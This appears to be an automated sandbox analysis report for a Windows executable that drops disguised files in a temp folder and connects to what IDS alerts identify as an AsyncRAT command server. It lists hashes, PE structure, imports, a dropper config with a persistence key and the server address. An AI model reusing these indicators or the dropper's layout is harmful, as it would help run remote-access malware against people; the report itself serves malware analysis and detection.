                                      Preview:k11085i47B098ipIZ397O713A9153F9TV9447A8O8H5my1y..BA7152R96q91a7Ny7hNqIB4d427iaCLIFQ5393u02rS8q72ANHu7v88k..88rO6w538B8928El4Gi1944cV8413542037a..gqPB82C4O682aa3175028f3I037dIV0G490O7g1nP6e4J0Ui79lOi..5zy39Xh71e2Yg5mUo4352696z62Z328xh572U0Iu7WN70G2Z35324Y6f8uys0CzMe7HbY5mETD8X5LqvEA7..u663LUeLk9pED0zkG579EK87H3k17LC8Uobwq892l6qU320039RM3a7Q630Cb2xoIj345w57i..C9ECu9v8729iLky2rf5eV9K8951598I2Mm0aG615HMO1041UV4c9971pVWd..Edd51cjqXrpUu5st46092f8n897YkhNHs610O171Iz590126NX1817wq95sh8CC57l62l3J7..0P6V19I106F862nX264qFA1Nu6h65mcl27471t664yPvL3QUg735OwV3EeX0a5K38Oe7ioC2834W69E3f8Zs09..1795L781Y4qRAKg847Hm8SDCZ1eu4W2ZF9ys83V04U..3gLjtM8TQ6p781y8zn69480UCd246020l6..wP71598C1900839D27X56Sps..1z9DJ7TbTs06r3Q6nbksStmb6Sfi42iF3PTC5r6L233gan..0E2g1B3Z22Ny6U01x804stYL74sc9oj..821csA8952KiM2B3G0E7E594b2Rqsk6xtl2Tis54sEJ3NWXZ4G24Rr3..ke3LB5QUZj4Qi5gDr4w79Cu..68J0w7300016B71m2O4R4Gn788pBV7N2VDNlY4P8b..q8f49e87377v52HW335d29k12gJ7e6908FO33EbBE2eAn00sK9x0T095..p4i8N7f44723O74z5ie66333f1dY4h0122H9k785o489C7i

                                      C:\Users\user\AppData\Local\Temp\afda\rxappxurje.txt

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):578
                                      Entropy (8bit):5.55462349735179
                                      Encrypted:false
                                      SSDEEP:12:HgjxwyARG+OQkzPJxvqmsmguTt2FnPqfp/cMcuSf5aMwE8Rc:Hma6PJxvoJuT4FSx/cX5UEec
                                      MD5:BD024A03BEDCF16316AB8A1EC87ADAA6
                                      SHA1:0D7003B89301CCF8CDB326C3FCD98E96A60F1663
                                      SHA-256:1BCF4BA6AD5075F633662C184DE0E46B4E5764B70FFCF8840C48BE4679398560
                                      SHA-512:28294B36BA4AB7290010EA826952A4F82A06123987C84B3A91DB90B5AE7B6E538A407933A750AA4619F7D93449A721B648ECB7F256758ABB9FBFAC92C6ACF066
                                      Malicious:false
                                      Preview:92IMS0831753n1742846xcKi98352P20l3g47O5ZDW399nZ3m29Uxc8776oR4lYzAm009q..ColorConstants ComboConstants..79244Qv97071u88o1237p2J8493G0908Sd5J5o4779pOhuH7U4XnE1p0F17F897gWg05j2g4pQ..BorderConstants ColorConstants..KfWc404R3PM8N81xlyh1WRs100d477r11Bes0ln48M3pmr6eJ7803c141R70I3DaQ0s4Y9..ToolbarConstants ComboConstants..yd145r1VGKW045ArLepx6932WX1Q5Lqo356601609scn0RX0ccNGc41UZOrg9x089TImZ..TreeViewConstants GuiDateTimePicker..m4779it98iBSS2H41B3DZqR04pp0S3zpWI5A0Bh3C2Y93f5H07muh7E663vdnbI2J3m518HU118fT1YW656yg7WV1ksd16F64n363W35493a15nD783FNq..FontConstants StructureConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\ubddmvlr.jpg

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):506
                                      Entropy (8bit):5.616383312872459
                                      Encrypted:false
                                      SSDEEP:12:wCixLARfyJKz++SGUVxSKvKuE8R0RcdbgXsyy/UJ:wB+VsKSrVEKSuEeic2X6/UJ
                                      MD5:E167B220B80135A631F589043CA899B5
                                      SHA1:0E0850082F18334CD783DD174345934AED7221C5
                                      SHA-256:819EA1F99B61B3DC631F935EB6C5876034F373EB1EC4FEC2DB8873523696C518
                                      SHA-512:CC5FE2989BA6C3BCE2310C28D0398500436E65DB6B8EEA08387C99E5871E2AACBAE908A4B1C89B57EF1847A40FFEE82A1777B4577EB01E7235176566CA965C86
                                      Malicious:false
                                      Preview:4v826462174I5lWO87q6wXTVA0E49B3QnrKH2N7g11zT0u29S8ePHlTi7zW34Z43sD4wzvDa1oi4UO350og4m5816Ns54m8Fqzf8P6s16c8bTtx48d5X7W66N2VJ0u392M55eI16MDUL5I45d120LX38ru..ToolTipConstants BorderConstants..PZA2O6qX86c988XJ1519vG92kE5ig9iu6cN63Y819775T13S6kMC05aTUo4rD7W7360W1Xo2LI86c64gGp2F5s021Z4FAJm6vL0oBj9i19nSS974za8420R9QH0k2le..FontConstants StructureConstants..1d50bx51ta0851Ip0QK9C24Fk6i74462M4rxe147T2K78M68yRRW0ROzqxqgQ4q8Zt3e2fDmLMxK53K0sJ4hVF1Qkgp5R8W66e5X450B5T33k12p62eCO..StructureConstants FontConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\ulgwpj.dll

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):519
                                      Entropy (8bit):5.630465665150215
                                      Encrypted:false
                                      SSDEEP:12:jWMubVd2pSlVcmR9Sz2nf9+xTkRJx72COem0uc:VlSjFRNdbIZem0uc
                                      MD5:70C69AA9F7B1E888CA0714E89BE32098
                                      SHA1:4F4BB1D33E921CF93182936499BFDF16A96F7F97
                                      SHA-256:7ADB1E9738343F7EBE30EF6B7F6650FFFEE059EC22D98EBF17DC135E2C835B2F
                                      SHA-512:A01EB39E1FBC1A647D316264260B8C1748F1C49509342B04547B94BD09FDA4B26FA04AA6D10C799A1426AE69746A6A2383E6963CEBACF3E66194E295C13E686E
                                      Malicious:false
                                      Preview:o34Jj1t91U565ClVMKU1I5n2xfyn87qi2UB9zlU0X1mIwt0c0L6Q7e2J04875mn0620d2J269QAZp6eb9H2..DateTimeConstants GuiDateTimePicker..77654f..GuiDateTimePicker GuiDateTimePicker..T3041v39DD4mkVxX2Y8566G1v1h653q5N9G1gU0ETYJEfK8Z3h3088i9gO97o07594O4fX7vmV2KAcPQ0v8LI27vfQIcc8L62WkOLb26939dcVH5o2WP69O1L8D895mqg2V4h4O67fN810W0kegQUq255cEoB0kzM0Z5C3O23zOdd18..GuiDateTimePicker ComboConstants..33Hmaj5J68xO0L35m081004Ei5T5903S9Ja9u09252705gc6unJ89h8rYx67aJK1369AmGu0zw8bK2354g79n34t7m36XyN7dZ4c0..GuiDateTimePicker StructureConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\wdfnhena.jpg

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):551
                                      Entropy (8bit):5.464724766594262
                                      Encrypted:false
                                      SSDEEP:12:u/nl+yfdZlvaE2S0GjIAVSmf9lQLITUu7rBPuq1qy2Xva/XR:fyFbx2JyS69OLIhrrgP/SR
                                      MD5:F6DE4EFF7A4743ECFB4FE11E27DDE3B4
                                      SHA1:B451BE4E2C5A0873AD0A69D4855D75CB065A06BE
                                      SHA-256:2F77B1B7FE13AA79B41995F99BE0EF1B85B492C30B594DEAF0239257C72A5BFE
                                      SHA-512:0D0470CE4514A6A6951847AC61F5D09AB99E4B064FE4AD8E21A4F8AFED68D56BD996EDA5392AE6E8BE5C4824B884E85D76A4511872386873557D4730C5ABBE9C
                                      Malicious:false
                                      Preview:DF3853Cv6G2uAvl9O8a03egwF4zKBMW8DT8F..UpDownConstants BorderConstants..ngD9b3GQ8VOF526bx..ToolbarConstants DateTimeConstants..0ZB2P1YA03zsxrOH71yMgRL56389398XddRO963kkRSN..FontConstants BorderConstants..7JO3CW7xBwJ5y4K43DNh6KCj9OT1jd1Ew8tp6201r2nCb..ButtonConstants ComboConstants..c985j8iDQC971U5Y3T773tV5518dH48VL29WUQm0A026K285qx161tcw0Es15vs5JgQJm3u43gvB..StructureConstants TreeViewConstants..4j1k4nK3ObA65TO265579892TH94a2C7Y7l6B76q5s7Qz50b06766dCMI9N16..ToolTipConstants ComboConstants..K3os83FI0IhD875J2nu..DateTimeConstants ToolbarConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\wnfj.docx

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):639
                                      Entropy (8bit):5.602648525665025
                                      Encrypted:false
                                      SSDEEP:12:EuAcO3XlFyzyVP21+KTizbQQ21BP42OHLLWHwl3MxKoH9Rd9qqPlWSOC7uWk:EUOHlWy4YKOz0Q21JoASu3dxP+6Zk
                                      MD5:D0C528931B9B927B80B3FF7191E579EB
                                      SHA1:2060A0C27AB1C778D6B70828C2DFF9D1059E1A70
                                      SHA-256:466DB50BDC62D3C43698CF27D34FF2589782A4C81776DD3D79AAC808208FB512
                                      SHA-512:D508F51FA8CBD713BF9CC426D175193C1D78B670D193A9C1037B4B8C3E89E76F1CE712C74A2917CE81A8B8BBC5A28F1118DB1938BB9880EBCE5241813D0E55CD
                                      Malicious:false
                                      Preview:l4eS1vLhg329by80Cr512210213opL99SyvX9jY9b82566q02W5a3G61O9845Y43549g8KvCLM2hIcF4OU0qb1dq82F4Tm566258E98082l..TreeViewConstants ToolbarConstants..QclN133d1Xdi55O1Dv59y2qL9x4d6eh5woj68u0AHV134C4cpP18p6m2Xq8H65597J52l4hImFd878nw81..FontConstants TreeViewConstants..Gleu275qKt3xw..BorderConstants DateTimeConstants..LD3Y034412Cyv93x9Y96Mi75899PWb43bphphSr9qclQ3u70o55884u79f8e8XBBpi358P8cUj024rnOb..StructureConstants StructureConstants..Dk6W083Uohe2V6aL2P7bX204YIg3Au21W113f2r965098PZ01d2H53c99qhz22287719T5Q715E32a7S34PD789Dr0M5748h01xM75i8pwQv34G84Lo8kd4aEJt7amEFD4QZsO4RH768p825AF6q7iOg22f06pTCgNiVX37zn..ToolTipConstants UpDownConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\xbdarhjg.icm

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):568
                                      Entropy (8bit):5.5561410123959805
                                      Encrypted:false
                                      SSDEEP:12:V8/EbUgzwRzDaaoTdvq8ZcYij13oADRywploryNBc5Qa3IPqUGvxTPrBPc:rwiKartqacYijCAtyAlormI3IyUGvtO
                                      MD5:F1A870694962DA77AF70D0D8180AF415
                                      SHA1:3686ECC61CF21D56C70C7F71160CC0ABC5D438D3
                                      SHA-256:2E3AC55B4C9E18CC1B11F739089EB6A0382AB64DF61D7FFB60B6E21B1A3B2852
                                      SHA-512:74CE196CDBDC9F308DBA90E8146768FDC7AEBEF286B028F741BED0903C3A68FEB820C1FB46B021F804DEFAE8647C1AC0309EAC3AEE320B22EC3011FAD9F3B6AB
                                      Malicious:false
                                      Preview:7doUr0WOs6Q7hdA355013Q1YC3lIKjAF37D5m1195tL7fa4pg2IQ69iFuA0Ja1yd14ThC9jVz248Cv825do0ZO88u160Aoku7j10Ek23uJ739X130M871fH5T8TT28e72Iwvn8XA6Ta7879OqL..ToolTipConstants BorderConstants..89h5V3250i86Bx8221dhTaME99T77P77pz1TA596j858i4yR6xi11xCk8as220531O3o2874fhj7T..ButtonConstants StructureConstants..D778Tr9Cs5pA16175pum81cnj7AT0E8313py59iipwQ1..ButtonConstants GuiDateTimePicker..VMW60ld653KZ3g103o028764Jt3c7CD..UpDownConstants ComboConstants..bxgd91A8C9SReE238cjAgwE7EZhm448IM7241g308u304j4h91la94oNV997MB6fmFdAh42f6Cvd21XUy1PjJ1..TreeViewConstants TreeViewConstants..

                                      C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):114364086
                                      Entropy (8bit):7.089953620024949
                                      Encrypted:false
                                      SSDEEP:12288:lqYTpLqYTpCqYTpGqYTpMqYTp4qYTpGqYTprqYTpOqYTp9qYTpjqYTpuqYTp+qY0:s1
                                      MD5:3F2E528480F94C8DB48BE4427CB904FC
                                      SHA1:2E8C1007444E32B481B87AD89FE0DF37A0BD1BE8
                                      SHA-256:9066F65824D720DFE4B8EEDB19C196B10846A84CA78B7637C0D6632409B3C53E
                                      SHA-512:A40F02857F1BBCF4B764476708D4B5A10A7F0968D0EB9BE301D0881D77187207715B987587140ACBA4D38B062C5FF96836D21A8EAC2A9A540F8E13448A337964
                                      Malicious:true
                                      Preview:..;..#ch.UJ...4.........R.T..."?..R...X.eD..bi..G}cW$...Q.e.nR~.@.....vhlM..f.bD=...x%/A/b..C..O........#.c.s...2:........eS.W.J...j.Q....l"...9. .......l..%S...=........R..U9...%..../...c...L.T.Y....D...n...'..=.y%....f@v.....Gi.4^g........Q...E"..q..D.-&.....D..E...v....t.)....y/*jxW=... 4uzY.....{f.>n...#.....#.2;.)....b2(.|M*....$ic..Lr~.f.*.z.#Dl.....;......j.w.D......b..8..U.q.ZWM!...Kf........GW..Ecc....[...."&Ji..K..../!Ai.....'..}<.-A..gR.J...8U>.)....:p.J.,.)....=-......eg.O.`,u..y.~..l..../.Tg.^*.l....m..VT4.(.c...1k`....%....L........s...Hj..1......!uk.:..B....P.,I]*..Z..Oo. 8..U...4o.L.....@.@......m.`4Ukj.P!.."..............i....&.2.tr. ,A..=7vs..ec..../....Hf;r..q.>...j..3 ..R).j.....Z.t...L..;....m...:..I^#@A.#...c(@.......Y.....-...G.M..1..i$'%.Xk'....2.5.h.o.E.5.0.5.3.1.w.1.E.k.4.9.L.2.o.E.5.5.h.8.4.8.q.5.d.L.9.8.5.z.....B.1.L.6.q.7.L.5.5.r.M.1.8.3.i.K.3.8.1.1.Z.7.2.6.0.6.o.8.6.L.M.0.x.X.5.S.R.B.5.4.....b.7.I.S.

                                      C:\Users\user\temp\rjhr.pdf

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):80
                                      Entropy (8bit):4.840634426587139
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:09718BC0899AF7E0A7BC2F64308A4571
                                      SHA1:1E850736F79B88CBBE25053C2C028C0202C9B555
                                      SHA-256:A7FD57763F2229FC23DC7F9C1F7C660E5D8519605D265C3DBD14C763CA328302
                                      SHA-512:513B61A1427C4720ED77FB82D98CFC8CA4294C886777B07D24E679192B9E2ED2AF7A2E3789E74694EB2F149089E881BF04BB45DA4725B8BB248472884DBDAD66
                                      Malicious:false
                                      Preview:[S3tt!ng]..stpths=%temp%..Key=WindowsUpdate..Dir3ctory=afda..ExE_c=cipkucw.ppt..

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.6731471205184265
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:yjOJ1YK5M3.exe
                                      File size:1'020'449 bytes
                                      MD5:7b17ebbf77f53472d2febb38e9785026
                                      SHA1:f3e6e40de8a8ca8b7cc3f8f4d636ad788df39935
                                      SHA256:c23b7950208b8f8e8a22c401cb5e9a05e560ae6119307d975ba601b4e2e99273
                                      SHA512:40aeebe55e881e59d0a765a03dcf9d626cf6b83bf7fa667f63098c18d8d745f225a7d779ba1abaae1fdb185695df8bece6f7231c0b6c294ba52a48a5f083d4ac
                                      SSDEEP:24576:hN/BUBb+tYjBFHL68+WHE3YLXiM0hD6di/AX:jpUlRhTfHEoLXiM0hDTU
                                      TLSH:B4250212B7C480B2D0B229324AB6D750167D7D612F658A8F53E03DBEAB705D2D631FA3
                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b

                                      File Icon

                                      Icon Hash:260e087d1f333737

                                      Static PE Info

                                      General

                                      Entrypoint:0x4265d0
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:99ee65c2db82c04251a5c24f214c8892

                                      Entrypoint Preview

                                      Instruction
                                      call 00007F4F20CF23CBh
                                      jmp 00007F4F20CF1D4Dh
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ecx
                                      lea ecx, dword ptr [esp+08h]
                                      sub ecx, eax
                                      and ecx, 0Fh
                                      add eax, ecx
                                      sbb ecx, ecx
                                      or eax, ecx
                                      pop ecx
                                      jmp 00007F4F20CF13FFh
                                      push ecx
                                      lea ecx, dword ptr [esp+08h]
                                      sub ecx, eax
                                      and ecx, 07h
                                      add eax, ecx
                                      sbb ecx, ecx
                                      or eax, ecx
                                      pop ecx
                                      jmp 00007F4F20CF13E9h
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      lea ecx, dword ptr [ebp-0Ch]
                                      call 00007F4F20CE4929h
                                      push 0044634Ch
                                      lea eax, dword ptr [ebp-0Ch]
                                      push eax
                                      call 00007F4F20CF2BF7h
                                      int3
                                      jmp 00007F4F20CF892Eh
                                      int3
                                      int3
                                      push 004293C0h
                                      push dword ptr fs:[00000000h]
                                      mov eax, dword ptr [esp+10h]
                                      mov dword ptr [esp+10h], ebp
                                      lea ebp, dword ptr [esp+10h]
                                      sub esp, eax
                                      push ebx
                                      push esi
                                      push edi
                                      mov eax, dword ptr [00449778h]
                                      xor dword ptr [ebp-04h], eax
                                      xor eax, ebp
                                      push eax
                                      mov dword ptr [ebp-18h], esp
                                      push dword ptr [ebp-08h]
                                      mov eax, dword ptr [ebp-04h]
                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                      mov dword ptr [ebp-08h], eax
                                      lea eax, dword ptr [ebp-10h]
                                      mov dword ptr fs:[00000000h], eax
                                      ret
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      mov ecx, dword ptr [ebp-10h]
                                      mov dword ptr fs:[00000000h], ecx
                                      pop ecx
                                      pop edi
                                      pop edi
                                      pop esi
                                      pop ebx
                                      mov esp, ebp
                                      pop ebp
                                      push ecx
                                      ret
                                      push ebp
                                      mov ebp, esp

                                      Rich Headers

                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x47d700x34.rdata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x47da40x50.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x15b18.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x6e0000x2afc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x445800x54.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x446000x18.rdata
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3ec580x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x280.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4722c0x120.rdata
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x3a32c0x3a400e320764e1b3c816ba80aeb820cb8a274False0.581381605418455data6.685359764265178IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x3c0000xcbf80xcc0047c3be3304bfdfb2a778f355849d1c3fFalse0.4439529718137255data5.167069652624378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x490000xd7e00x12006335f9314c2900dccb530e151f1b1ee8False0.3956163194444444data4.0290550032041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .didat0x570000x1a80x200232a8fe82993b55cefe09cffc39a79b0False0.462890625data3.5080985761326375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x580000x15b180x15c0001347fc060c4871e2beac057b6f6bee3False0.6677779274425287data6.453733102547725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x6e0000x2afc0x2c0098fd4bc572f87a21f69dc57f720a6dbcFalse0.75data6.617141671767599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      PNG0x588240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                      PNG0x5936c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                      RT_ICON0x5a9180x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.32682926829268294
                                      RT_ICON0x5af800x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.43548387096774194
                                      RT_ICON0x5b2680x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 2880.514344262295082
                                      RT_ICON0x5b4500x1c8Device independent bitmap graphic, 22 x 44 x 4, image size 2640.5241228070175439
                                      RT_ICON0x5b6180x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.5878378378378378
                                      RT_ICON0x5b7400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.5053304904051172
                                      RT_ICON0x5c5e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.634927797833935
                                      RT_ICON0x5ce900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.532258064516129
                                      RT_ICON0x5d5580x690Device independent bitmap graphic, 22 x 44 x 8, image size 528, 256 important colors0.544047619047619
                                      RT_ICON0x5dbe80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.3872832369942196
                                      RT_ICON0x5e1500x8620PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9990097856477167
                                      RT_ICON0x667700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.34948132780082986
                                      RT_ICON0x68d180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.4376172607879925
                                      RT_ICON0x69dc00x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.41721311475409834
                                      RT_ICON0x6a7480x810Device independent bitmap graphic, 22 x 44 x 32, image size 20240.48546511627906974
                                      RT_ICON0x6af580x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.6214539007092199
                                      RT_DIALOG0x6b3c00x286dataEnglishUnited States0.5092879256965944
                                      RT_DIALOG0x6b6480x13adataEnglishUnited States0.60828025477707
                                      RT_DIALOG0x6b7840xecdataEnglishUnited States0.6991525423728814
                                      RT_DIALOG0x6b8700x12edataEnglishUnited States0.5927152317880795
                                      RT_DIALOG0x6b9a00x338dataEnglishUnited States0.45145631067961167
                                      RT_DIALOG0x6bcd80x252dataEnglishUnited States0.5757575757575758
                                      RT_STRING0x6bf2c0x1e2dataEnglishUnited States0.3900414937759336
                                      RT_STRING0x6c1100x1ccdataEnglishUnited States0.4282608695652174
                                      RT_STRING0x6c2dc0x1b8dataEnglishUnited States0.45681818181818185
                                      RT_STRING0x6c4940x146dataEnglishUnited States0.5153374233128835
                                      RT_STRING0x6c5dc0x46cdataEnglishUnited States0.3454063604240283
                                      RT_STRING0x6ca480x166dataEnglishUnited States0.49162011173184356
                                      RT_STRING0x6cbb00x152dataEnglishUnited States0.5059171597633136
                                      RT_STRING0x6cd040x10adataEnglishUnited States0.49624060150375937
                                      RT_STRING0x6ce100xbcdataEnglishUnited States0.6329787234042553
                                      RT_STRING0x6cecc0x1c0dataEnglishUnited States0.5178571428571429
                                      RT_STRING0x6d08c0x250dataEnglishUnited States0.44256756756756754
                                      RT_GROUP_ICON0x6d2dc0xe6data0.5739130434782609
                                      RT_MANIFEST0x6d3c40x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                      Imports

                                      DLLImport
                                      KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                      gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-12-31T20:26:35.833177+01002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)1195.26.255.812106192.168.2.449737TCP
                                      2024-12-31T20:26:35.833177+01002030673ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)1195.26.255.812106192.168.2.449737TCP
                                      2024-12-31T20:26:35.833177+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert1195.26.255.812106192.168.2.449737TCP
